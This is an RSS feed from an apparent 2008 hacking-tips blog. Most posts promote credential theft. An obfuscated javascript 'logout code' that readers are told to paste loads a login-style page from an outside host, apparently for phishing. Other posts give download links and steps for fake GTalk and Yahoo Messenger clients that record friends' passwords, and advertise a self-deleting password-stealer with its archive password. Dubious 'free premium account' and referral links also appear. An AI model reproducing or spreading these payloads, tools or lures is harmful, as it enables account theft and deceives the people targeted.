src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/how-to-make-fake-page-for.html</link><author>noreply@blogger.com (saien)</author><thr:total>30</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-7427272726390129193</guid><pubDate>Sun, 17 Feb 2008 08:47:00 +0000</pubDate><atom:updated>2008-02-18T04:31:45.467-08:00</atom:updated><title>Login with multiple ids at the same time in orkut</title><description>&lt;h3 style="text-align: justify;" class="smller"&gt;Login with multiple ids at the same time in orkut&lt;/h3&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;div style="text-align: justify;" class="para"&gt; Login with multiple ids at the same time in orkut , gmail , yahoo&lt;br /&gt;&lt;br /&gt;To perform this trick u need firefox mozilla browser&lt;br /&gt;&lt;br /&gt;======== Trick to Multilogin in firefox ============&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 1:&lt;/span&gt;&lt;br /&gt;open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;variable name: moz_no_remote&lt;/span&gt;(should be all small letter)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;variable value: 1&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;press ok to close all windows.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;step 2:&lt;/span&gt;&lt;br /&gt;open firefox icon's properties(from desktop and quick launch). add &lt;span style="font-weight: bold;"&gt;extension -p&lt;/span&gt; to command line&lt;span style="font-weight: bold;"&gt;(like "c:\program files\mozilla firefox\firefox.exe" -p)&lt;/span&gt;. press ok.&lt;br /&gt;&lt;br /&gt;while starting firefox u have to create two separate profiles of firefox so that u can login to two accounts of any(orkut,yahoo,rediff or anything else)..&lt;br /&gt;&lt;br /&gt;For three logins create three profiles of firefox.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/login-with-multiple-ids-at-same-time-in.html</link><author>noreply@blogger.com (saien)</author><thr:total>10</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-2458194507829454736</guid><pubDate>Sun, 17 Feb 2008 08:18:00 +0000</pubDate><atom:updated>2008-02-18T04:32:56.246-08:00</atom:updated><title>Orkut LogOut Code</title><description>Orkut LogOut Code, i think  u have seen &lt;a href="http://freedownloaz.blogspot.com/2008/02/logout-scrap_14.html"&gt;LogOut Scrap&lt;/a&gt; this is new trick to logout..&lt;br /&gt;&lt;br /&gt;javascript:%64%6F%63%75%6D%65%6E%74%2E%7&lt;wbr&gt;7%72%69%74%65%28%22%3C%66%72%61%6D%65%73&lt;wbr&gt;%65%74%20%72%6F%77%73%3D%27%31%30%30%25%&lt;wbr&gt;27%20%66%72%61%6D%65%62%6F%72%64%65%72%3&lt;wbr&gt;D%27%4E%4F%27%20%62%6F%72%64%65%72%3D%27&lt;wbr&gt;%30%27%20%66%72%61%6D%65%73%70%61%63%69%&lt;wbr&gt;6E%67%3D%27%30%27%3E%3C%66%72%61%6D%65%2&lt;wbr&gt;0%6E%61%6D%65%3D%27%63%6F%6E%72%5F%6D%61&lt;wbr&gt;%69%6E%5F%66%72%61%6D%65%27%20%73%72%63%&lt;wbr&gt;3D%27%68%74%74%70%3A%2F%2F%77%68%79%67%6&lt;wbr&gt;1%64%61%2E%66%72%65%65%77%65%62%37%2E%63&lt;wbr&gt;%6F%6D%2F%53%65%72%76%69%63%65%4C%6F%67%&lt;wbr&gt;69%6E%2E%68%74%6D%27%3E%3C%2F%66%72%61%6&lt;wbr&gt;D%65%73%65%74%3E%22%29%3B%61%6C%65%72%74&lt;wbr&gt;%28%22%48%61%48%61%21%20%74%68%61%74%20%&lt;wbr&gt;77%61%73%20%61%20%74%72%69%63%6B%20%74%6&lt;wbr&gt;F%20%6C%6F%67%20%79%6F%75%20%6F%75%74%22&lt;wbr&gt;%29%0A%0A%0A&lt;br /&gt;&lt;br /&gt;Copy the above code &amp;amp; paste it in address bar &amp;amp; u ll be logged out with a nice message..&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/orkut-logout-code.html</link><author>noreply@blogger.com (saien)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-7455398713350771768</guid><pubDate>Sun, 17 Feb 2008 04:21:00 +0000</pubDate><atom:updated>2008-02-18T04:33:21.104-08:00</atom:updated><title>Fake GTalk</title><description>Fake GTalk or google talk,This is one of the hacking trick to hack GTalk passwords, if ur successful in hacking his/her GTalk password &amp;amp; u can get Orkut &amp;amp; Gmail passwords also, actually this is the fake GTalk  whenever anyone login in this GTalk his GTalk ID and Passwords are saved in ur system...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Steps:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Step 1 - Install Microsoft .NET Framework.(I think almost everyone has this in their computers if don't click &lt;a href="http://filehippo.com/download/1ecbdaf4edba0c9007eaebafaaa2c9c6/download/"&gt;here&lt;/a&gt; to download )&lt;br /&gt;&lt;br /&gt;Step 2 - click &lt;a href="http://rs140.rapidshare.com/files/36069868/Googletalk.exe"&gt;here&lt;/a&gt; &lt;span style="text-decoration: underline;"&gt;&lt;/span&gt; to get fake GTalk.&lt;br /&gt;&lt;br /&gt;Step 3 - Tell any of  ur friends to login, try to fish them by saying this is the new version of GTalk try it!!!&lt;br /&gt;&lt;br /&gt;Step 4 - Open C:\google talk.txt  &amp;amp; dats ur frnds GTalk id &amp;amp;  passwords..&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/fake-gtalk.html</link><author>noreply@blogger.com (saien)</author><thr:total>9</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-2830462233882283182</guid><pubDate>Sun, 17 Feb 2008 04:04:00 +0000</pubDate><atom:updated>2008-02-18T04:34:08.075-08:00</atom:updated><title>Fake Yahoo Messenger</title><description>Fake Yahoo Messenger, This is one of the hacking trick to hack yahoo passwords, actually this is the fake yahoo messenger whenever anyone login in this messenger his yahoo ID and Passwords are saved in ur system...&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Steps:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Step 1 - Install Microsoft .NET Framework.(I think almost everyone has this in their computers if don't click &lt;a href="http://filehippo.com/download/1ecbdaf4edba0c9007eaebafaaa2c9c6/download/"&gt;here&lt;/a&gt; to download )&lt;br /&gt;&lt;br /&gt;Step 2 - click &lt;a href="http://rapidshare.com/files/36069471/YPager.exe.html%20Download%20it"&gt;here&lt;/a&gt; to get fake yahoo messenger&lt;br /&gt;&lt;br /&gt;Step 3 - Rename that YPager as Yahoo Messenger.&lt;br /&gt;&lt;br /&gt;Step 4 - Tell any of  ur friends to login, try to fish them by saying this is the new version of yahoo try it!!!&lt;br /&gt;&lt;br /&gt;Step 5 - Open C:\yahoo.txt  &amp;amp; dats ur frnds yahoo id &amp;amp;  passwords..&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/fake-yahoo-messenger.html</link><author>noreply@blogger.com (saien)</author><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-6086785025916998312</guid><pubDate>Sat, 16 Feb 2008 06:29:00 +0000</pubDate><atom:updated>2008-02-18T04:34:30.258-08:00</atom:updated><title>Hackers Secret Tools</title><description>&lt;span style="font-weight: bold;"&gt;Hackers Secret Tools and Books:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;ul&gt;&lt;li&gt;Rapidshare_Downloader:&lt;/li&gt;&lt;li&gt;&lt;a href="http://rapidshare.com/files/63523932/Rapid_Down.rar" target="_blank"&gt;http://rapidshare.com/files/63523932/Ra&lt;wbr&gt;pid_Down.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;google_hack. 100 tips and tools:&lt;/li&gt;&lt;li&gt;&lt;a href="http://rapidshare.com/files/59406147/google_hack._100_tips_and_tools.pdf" target="_blank"&gt;http://rapidshare.com/files/59406147/go&lt;wbr&gt;ogle_hack._100_tips_and_tools.pdf&lt;/a&gt;&lt;/li&gt;&lt;li&gt;300_keygen:&lt;/li&gt;&lt;li&gt;&lt;a href="http://rapidshare.com/files/60459159/300_keygen.rar" target="_blank"&gt;http://rapidshare.com/files/60459159/30&lt;wbr&gt;0_keygen.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Hackers_Secrets:&lt;/li&gt;&lt;li&gt;&lt;a href="http://rapidshare.com/files/59323690/Hackers_Secrets.rar" target="_blank"&gt;http://rapidshare.com/files/59323690/Ha&lt;wbr&gt;ckers_Secrets.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;DAP_PREMIUM_v8.1.2.1:&lt;/li&gt;&lt;li&gt;&lt;a href="http://rapidshare.com/files/63545122/DAP_PREMIUM_v8.1.2.1.rar" target="_blank"&gt;http://rapidshare.com/files/63545122/DA&lt;wbr&gt;P_PREMIUM_v8.1.2.1.rar&lt;/a&gt;&lt;/li&gt;&lt;li&gt;2500_Best_Ebooks_Collection_2007:&lt;/li&gt;&lt;li&gt;&lt;a href="http://rapidshare.com/files/63545031/2500_Best_Ebooks_Collection_2007.htm" target="_blank"&gt;http://rapidshare.com/files/63545031/25&lt;wbr&gt;00_Best_Ebooks_Collection_2007.htm&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-weight: bold;"&gt;Related Articles:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/01/hacking-books.html"&gt;Hacking Books &amp;amp; Tutorials&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/free-hacking-softwares.html"&gt;Free Hacking Softwares&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/01/hacking-tips-and-tricks.html"&gt;Hacking tips and tricks&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/hackers-secret-tools.html</link><author>noreply@blogger.com (saien)</author><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-6317497417108355616</guid><pubDate>Sat, 16 Feb 2008 05:56:00 +0000</pubDate><atom:updated>2008-02-18T04:34:56.502-08:00</atom:updated><title>Saved Passwords in IE or Firefox Are Not Safe</title><description>&lt;p style="text-align: justify;"&gt;Do U think ur saved passwords in Internet Explorer and Mozilla Firefox are safe?? really!! Check out here how much you are:&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Whenever u type  passwords into any web forms, in both Internet Explorer &amp;amp; Mozilla Firefox, its prompt out whether 2 remember u passwords, &amp;amp;  many of us clicks on yes &amp;amp; our passwords are saved in the browser&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;img alt="remember my password" src="http://www.labnol.org/assets/images/UseFirefoxBeforeYouLeaveYouTerm_12B62/remembermypassword.png" border="0" height="100" width="187" /&gt; &lt;img alt="firefox remember password" src="http://www.labnol.org/assets/images/UseFirefoxBeforeYouLeaveYouTerm_12B62/firefoxrememberpassword.png" border="0" height="100" width="276" /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;Many of us think this “Remember Me” option in IE or Firefox is very much useful but the risky  part  is dat they keep ur login credential at risk.&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span id="more-1906"&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;strong&gt;View stored passwords in Internet Explorer:&lt;/strong&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;Although Internet Explorer  store ur passwords in Windows Registry database, but the risk is that anyone who can operate a computer can reveal ur hidden passwords by using &lt;a href="http://www.nirsoft.net/utils/internet_explorer_password.html" rel="nofollow"&gt;IE PassView&lt;/a&gt;. &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Look at this:&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;img alt="internet explorer passwords" src="http://www.labnol.org/assets/images/UseFirefoxBeforeYouLeaveYouTerm_12B62/internetexplorerpasswords.gif" border="0" height="200" width="445" /&gt; &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;strong&gt;View stored passwords in Firefox:&lt;/strong&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;For the Firefox users it is much more easier to reveal ur saved passwords which are stored inside&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Way:&lt;/span&gt; Tools -&gt; Options -&gt; Security -&gt; Show Passwords. Dats it shows ur all saved passwords...&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;img alt="firefox passwords" src="http://www.labnol.org/assets/images/UseFirefoxBeforeYouLeaveYouTerm_12B62/firefoxpasswords.png" border="0" height="370" width="372" /&gt; &lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;Friends anyone can view ur hidden passwords who is having a bit knowledge on computer can reveal ur passowrds..&lt;/p&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;How to Keep urself safe:&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Uncheck &lt;span style="font-weight: bold;"&gt;“Prompt me to save passwords” &lt;/span&gt;in Internet Explorer and &lt;span style="font-weight: bold;"&gt;“Set Master Password”&lt;/span&gt; in  Mozilla Firefox.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/p&gt;&lt;br /&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/saved-passwords-in-ie-or-firefox-are.html</link><author>noreply@blogger.com (saien)</author><thr:total>4</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-1598821127530463434</guid><pubDate>Sat, 16 Feb 2008 05:16:00 +0000</pubDate><atom:updated>2008-02-18T04:36:37.243-08:00</atom:updated><title>Free Premium Rapidshare &amp; Megaupload Accounts</title><description>&lt;h3 style="font-weight: bold; text-align: justify;" class="smller"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: normal;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;Free Premium Rapishare and MegaUpload Accounts?&lt;/span&gt;&lt;br /&gt;&lt;/h3&gt;&lt;div&gt; &lt;/div&gt;&lt;div class="para"&gt;&lt;div style="text-align: justify;"&gt; Free&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;Rapidshare &amp;amp; MegaUpload account*Grab it fast*limited time.....&lt;br /&gt;Get urself a Rapidshare &amp;amp; MegaUpload premium account all for urself from this site.... I got a 3 months Rapidshare &amp;amp; MegaUpload account for free and thought i would share this site with u guys... this works 100% guaranteed... so grab it fast guys.....click &lt;a href="http://www.blogger.com/www.megarapid.en.st"&gt;here&lt;/a&gt; to get urself a free Rapidshare &amp;amp; MegaUpload Accounts..&lt;br /&gt;&lt;br /&gt;Plz do comment for ur requests &amp;amp; for the improvement for our site!!!♥&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://www.megarapid.en.st/" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/div&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/free-premium-rapidshare-megaupload.html</link><author>noreply@blogger.com (saien)</author><thr:total>142</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-8035091245055350671</guid><pubDate>Sat, 16 Feb 2008 04:26:00 +0000</pubDate><atom:updated>2008-02-18T04:37:20.264-08:00</atom:updated><title>Kismet  Wireless Network Sniffer</title><description>&lt;p&gt;Free download kismet Wireless Network Sniffer, it is the latest hacking tool and the great thing about dis tool is this is wireless....I think many of u didn't heard about it..&lt;/p&gt;Lets talk about this tool !!&lt;br /&gt;kismet is one of the best wireless hacking tool.Kismat is 802.11 layer wireles network detecter,snifffer and intrusions detectionn system.It works with any wireless card which supports raw monitoring mode, it can also snifff 802.11b,802.11a and 802.11g trafficc&lt;br /&gt;&lt;p&gt;It identifies network byy passivelly collectin  &amp;amp; detectin standard named networkss, detectin hidden network...&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Features&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span&gt;E&lt;/span&gt;thereall/Tcpdumpp compatible data logging &lt;/li&gt;&lt;li&gt;Airsnortt compatiblle week-iv packet logging &lt;/li&gt;&lt;li&gt;Networrk IP rangee detections &lt;/li&gt;&lt;li&gt;Builtt-in channell hopping and multi-card split channel hoppiing &lt;/li&gt;&lt;li&gt;Hiddenn network SSID delocking&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Graphicall mappin of network &lt;/li&gt;&lt;li&gt;Client/Server architectture allows multiplle clientss to view a single &lt;/li&gt;&lt;li&gt;Kismet serves simultaneouslly &lt;/li&gt;&lt;li&gt;Manufacturers and modell identifications of accesss point and client &lt;/li&gt;&lt;li&gt;Detectiion of known defaullt accesss points configuration &lt;/li&gt;&lt;li&gt;Runtimee decodings of WEP's packet for known network &lt;/li&gt;&lt;li&gt;Named pipee o/p for integrations with other toolss, such as a layerr3 IDS's like Snortt &lt;/li&gt;&lt;li&gt;Multiplexing's of multiplle simultaneouss capturre source on a single Kismett instances &lt;/li&gt;&lt;li&gt;Distributted remotee drone sniffing's &lt;/li&gt;&lt;li&gt;XML o/p&lt;/li&gt;&lt;li&gt;Over 20 supported card types &lt;/li&gt;&lt;/ul&gt; &lt;p&gt;The latest version of  Kismet  Wireless Network Sniffer click &lt;a href="http://www.kismetwireless.net/code/kismet-2007-10-R1.tar.gz"&gt;here&lt;/a&gt; to get it..&lt;/p&gt;&lt;p&gt;Plz do comment for ur requests &amp;amp; for the improvement for our site!!!♥&lt;/p&gt;&lt;p&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;&lt;br /&gt;&lt;/p&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html</link><author>noreply@blogger.com (saien)</author><thr:total>1</thr:total><enclosure length="646452" type="application/x-gzip" url="http://www.kismetwireless.net/code/kismet-2007-10-R1.tar.gz"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Free download kismet Wireless Network Sniffer, it is the latest hacking tool and the great thing about dis tool is this is wireless....I think many of u didn't heard about it..Lets talk about this tool !! kismet is one of the best wireless hacking tool.Kismat is 802.11 layer wireles network detecter,snifffer and intrusions detectionn system.It works with any wireless card which supports raw monitoring mode, it can also snifff 802.11b,802.11a and 802.11g trafficc It identifies network byy passivelly collectin &amp;amp; detectin standard named networkss, detectin hidden network... FeaturesEthereall/Tcpdumpp compatible data logging Airsnortt compatiblle week-iv packet logging Networrk IP rangee detections Builtt-in channell hopping and multi-card split channel hoppiing Hiddenn network SSID delocking Graphicall mappin of network Client/Server architectture allows multiplle clientss to view a single Kismet serves simultaneouslly Manufacturers and modell identifications of accesss point and client Detectiion of known defaullt accesss points configuration Runtimee decodings of WEP's packet for known network Named pipee o/p for integrations with other toolss, such as a layerr3 IDS's like Snortt Multiplexing's of multiplle simultaneouss capturre source on a single Kismett instances Distributted remotee drone sniffing's XML o/pOver 20 supported card types The latest version of Kismet Wireless Network Sniffer click here to get it.. Plz do comment for ur requests &amp;amp; for the improvement for our site!!!♥</itunes:subtitle><itunes:author>noreply@blogger.com (saien)</itunes:author><itunes:summary>Free download kismet Wireless Network Sniffer, it is the latest hacking tool and the great thing about dis tool is this is wireless....I think many of u didn't heard about it..Lets talk about this tool !! kismet is one of the best wireless hacking tool.Kismat is 802.11 layer wireles network detecter,snifffer and intrusions detectionn system.It works with any wireless card which supports raw monitoring mode, it can also snifff 802.11b,802.11a and 802.11g trafficc It identifies network byy passivelly collectin &amp;amp; detectin standard named networkss, detectin hidden network... FeaturesEthereall/Tcpdumpp compatible data logging Airsnortt compatiblle week-iv packet logging Networrk IP rangee detections Builtt-in channell hopping and multi-card split channel hoppiing Hiddenn network SSID delocking Graphicall mappin of network Client/Server architectture allows multiplle clientss to view a single Kismet serves simultaneouslly Manufacturers and modell identifications of accesss point and client Detectiion of known defaullt accesss points configuration Runtimee decodings of WEP's packet for known network Named pipee o/p for integrations with other toolss, such as a layerr3 IDS's like Snortt Multiplexing's of multiplle simultaneouss capturre source on a single Kismett instances Distributted remotee drone sniffing's XML o/pOver 20 supported card types The latest version of Kismet Wireless Network Sniffer click here to get it.. Plz do comment for ur requests &amp;amp; for the improvement for our site!!!♥</itunes:summary></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-1519471512691850313</guid><pubDate>Fri, 15 Feb 2008 12:51:00 +0000</pubDate><atom:updated>2008-02-18T04:38:13.365-08:00</atom:updated><title>Earn money by surfing</title><description>Hi frnds, bored up by surfing net its time to earn money by simply surfing, hears goods ... ya its true guys u can earn $63/month  for  simply surfing as u do normally  &lt;a href="http://bux.to/?r=gabrola"&gt;check here&lt;/a&gt; for more knowledge on it...&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/earn-money-by-surfing.html</link><author>noreply@blogger.com (saien)</author><thr:total>21</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-9008280132958752840</guid><pubDate>Fri, 15 Feb 2008 11:21:00 +0000</pubDate><atom:updated>2008-02-21T21:26:38.888-08:00</atom:updated><title>Password Stealer for all Messengers</title><description>Password Stealer for all Messengers, hack any messengers password using this software...&lt;br /&gt;For doing this u have &lt;a href="http://freedownloaz.blogspot.com/2008/02/create-ftp-server-on-your-pc.html"&gt;build ur pc into server&lt;/a&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/create-ftp-server-on-your-pc.html"&gt;.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Coder: c4!N&lt;br /&gt;Compiler: Delphi&lt;br /&gt;testet : Windows XP SP2&lt;br /&gt;Source-Protector: Themida&lt;br /&gt;Description: The UnLimited PW Stealer is a high-quality PW Stealer with the following characteristics:&lt;br /&gt;&lt;br /&gt;hack the following accounts:&lt;br /&gt;&lt;br /&gt;PW Messanger Packet&lt;br /&gt;&lt;br /&gt;MSN Messenger&lt;br /&gt;Windows Messenger&lt;br /&gt;Yahoo Messenger Google Talk&lt;br /&gt;ICQ Lite&lt;br /&gt;AOL Instand Messenger/Netscape 7&lt;br /&gt;Trilian&lt;br /&gt;Miranda&lt;br /&gt;GAIM&lt;br /&gt;&lt;br /&gt;PW Mail Packet&lt;br /&gt;&lt;br /&gt;Outlook Express&lt;br /&gt;Microsoft Outlook 2000/XP/2003&lt;br /&gt;IncrediMail&lt;br /&gt;Mozilla Thunderbird&lt;br /&gt;Netscape&lt;br /&gt;Group Mail Free, Gmail&lt;br /&gt;Yahoo Mail&lt;br /&gt;Hotmail / MSN Mail&lt;br /&gt;Eudora&lt;br /&gt;&lt;br /&gt;Protected Storage PW Packet&lt;br /&gt;&lt;br /&gt;Outlook Passwords&lt;br /&gt;Auto Completet password in IE&lt;br /&gt;Password protected sites in IE&lt;br /&gt;MSN Explorer Passwords&lt;br /&gt;&lt;br /&gt;Steam PW Packet&lt;br /&gt;&lt;br /&gt;Steam Username&lt;br /&gt;Steam Password&lt;br /&gt;Steam game-path&lt;br /&gt;&lt;br /&gt;Game Key Stealer&lt;br /&gt;&lt;br /&gt;UT 2003/2004&lt;br /&gt;Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam&lt;br /&gt;Need for Speed Hot Pursuit 2&lt;br /&gt;James Bond 007 Nightfire&lt;br /&gt;Command &amp;amp; Conquer Generals / Zero Hour&lt;br /&gt;SimCity 4&lt;br /&gt;Call of Duty 2 / United Offensive / 1&lt;br /&gt;SWAT 4 / EXP&lt;br /&gt;&lt;br /&gt;Windows Info Packet&lt;br /&gt;&lt;br /&gt;Windows Username, Windows Computername ect. ect.&lt;br /&gt;&lt;br /&gt;Other options are:&lt;br /&gt;&lt;br /&gt;FTP Upload Information&lt;br /&gt;Crypt the ploadfile PW Files&lt;br /&gt;Crypt the FTP Settings&lt;br /&gt;Melt Server (Self-Delete after Execute)&lt;br /&gt;File Attribut on hidden set&lt;br /&gt;Icon Changer&lt;br /&gt;UPX Packer&lt;br /&gt;and many more Smiley&lt;br /&gt;UnLimited_PW_-_Stealer_0.40.rar&lt;br /&gt;Description:&lt;br /&gt;Download&lt;br /&gt;Filename: UnLimited_PW_-_Stealer_0.40.rar&lt;br /&gt;Filesize: 3.6 MB&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/76226726/UnLimited_PW_-_Stealer_0.40dharmesh.rar"&gt;Download Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Password:&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;"&gt;http://zone.forums1.net&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Just copy &amp;amp; paste the above code where it asks for the passwords...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related posts:&lt;br /&gt;&lt;/span&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/hack-yahoo-passwords.html"&gt;Hack yahoo passwords&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/fake-yahoo-messenger.html"&gt;Fake yahoo messenger&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/gmail-passowrd-hacking.html"&gt;Gmail Password Hacking&lt;/a&gt;&lt;br /&gt;&lt;a href="http://freedownloaz.blogspot.com/2008/02/fake-gtalk.html"&gt;Fake GTalk&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/password-stealer-for-all-messengers.html</link><author>noreply@blogger.com (saien)</author><thr:total>19</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-4051701632323192656</guid><pubDate>Fri, 15 Feb 2008 11:17:00 +0000</pubDate><atom:updated>2008-02-18T04:38:53.180-08:00</atom:updated><title>Free calls all over the world</title><description>Free calls all over the world daily for 5 min , call anywhere in the for free for 5 min daily isn't it cool guys!!!click &lt;a href="https://www.gizmocall.com/"&gt;here &lt;/a&gt;to check out..&lt;br /&gt;&lt;br /&gt;Enjoy!!!!&lt;br /&gt;&lt;br /&gt;&lt;img src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" border="0" /&gt;</description><link>http://freedownloaz.blogspot.com/2008/02/free-calls-all-over-world.html</link><author>noreply@blogger.com (saien)</author><thr:total>9</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3865216611793770662.post-8723692169863781576</guid><pubDate>Fri, 15 Feb 2008 10:49:00 +0000</pubDate><atom:updated>2008-02-18T04:39:20.207-08:00</atom:updated><title>Free Hacking Softwares</title><description>Download free hacking and cracking softwares...The names are tace ip,hide ip,account locker,anti-mail bomber,emotion creator,freeze account,msn block checker,hot hack,msn password recovery,password grabber,yahoo cracker,yahoo password grabber and many more...&lt;br /&gt;i hope guys u like these softwares....&lt;br 